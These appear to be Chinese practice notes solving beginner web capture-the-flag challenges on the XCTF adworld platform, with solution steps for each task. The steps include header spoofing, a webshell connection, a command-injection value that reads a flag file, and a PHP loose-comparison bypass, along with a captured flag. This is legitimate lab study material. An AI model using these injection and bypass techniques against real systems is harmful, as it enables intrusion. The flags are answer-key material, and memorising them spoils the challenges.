刷题 从简单的网站开始:
https://adworld.xctf.org.cn
curl http://111.198.29.45:31684
http://111.198.29.45:31684/?a=1 post b=2
http://111.198.29.45:31688/robots.txt
f1ag_1s_h3re.php
http://111.198.29.45:31689/index.php.bak
抓包:有个
Cookie: BL_D_PROV=undefined; BL_T_PROV=undefined; look-here=cookie.php
访问cookie.php 然后 查看返回的头
flag: xctf{da4630e034db74db11e85e31bd82e816}
查看元素
删除disabled
点击 可以获得flag
function dechiffre(pass_enc){
var pass = "70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65";
var tab = pass_enc.split(',');
var tab2 = pass.split(',');var i,j,k,l=0,m,n,o,p = "";i = 0;j = tab.length;
k = j + (l) + (n=0);
n = tab2.length;
for(i = (o=0); i < (k = j = n); i++ ){o = tab[i-l];p += String.fromCharCode((o = tab2[i]));
if(i == 5)break;}
for(i = (o=0); i < (k = j = n); i++ ){
o = tab[i-l];
if(i > 5 && i < k-1)
p += String.fromCharCode((o = tab2[i]));
}
p += String.fromCharCode(tab2[17]);
pass = p;return pass;
}
String["fromCharCode"](dechiffre("\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30"));
h = window.prompt('Enter password');
alert( dechiffre(h) );
786OsErtk12
直接在python中
a = '\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30'
a.split(',')
b = ''
for i in a:
b =b+chr(int(i))
print b
GET / HTTP/1.1
Host: 111.198.29.45:31727
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
X-Forwarded-For: 123.123.123.123
Referer: https://www.google.com
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
username=admin&password=123456
直接菜刀链接
target=127.0.0.1;tail /home/flag.txt
linux读文件命令:
cat, tac, more,less,head,tail,nl,od
弱类型比较
<?php
show_source(__FILE__);
include("config.php");
$a=@$_GET['a'];
$b=@$_GET['b'];
if($a==0 and $a){
echo $flag1;
}
if(is_numeric($b)){
exit();
}
if($b>1234){
echo $flag2;
}
?>
``` http://111.198.29.45:31755/?a=False&b=1235aaa